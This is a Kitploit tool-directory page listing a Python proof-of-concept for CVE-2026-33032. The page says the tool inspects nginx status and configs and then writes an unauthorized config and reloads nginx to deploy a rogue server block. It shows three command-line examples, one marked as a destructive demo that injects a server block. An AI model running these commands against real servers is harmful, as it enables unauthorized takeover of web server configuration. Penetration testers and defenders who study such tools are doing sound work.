Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-33032 — Python proof-of-concept for CVE-2026-33032 that inspects nginx status and configs, then demonstrates unauthorized config write with reload to deploy a rogue server block. | Kitploit
Tools/GitHubGitHub/baba01hacker666/cve-2026-33032
Vulnerability AnalysisExploitationWeb Application ExploitationConfiguration AuditingWeb SecurityPenetration Testing
GitHubbaba01hacker666/cve-2026-33032

CVE-2026-33032

Python proof-of-concept for CVE-2026-33032 that inspects nginx status and configs, then demonstrates unauthorized config write with reload to deploy a rogue server block.

View Repository
3 days agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-33032

Safe check (reads nginx status)

root@kitploit:~
python3 main.py http://target:9000 --tool nginx_status

List configs

root@kitploit:~
python3 main.py 10.0.0.50 --tool nginx_config_list

Destructive demo (writes + reloads)

root@kitploit:~
python3 main.py http://target:9000 \
  --tool nginx_config_add \
  --payload poc.conf \
  --content 'server { listen 8443; return 200 "MCPwned\n"; }'
Download Tool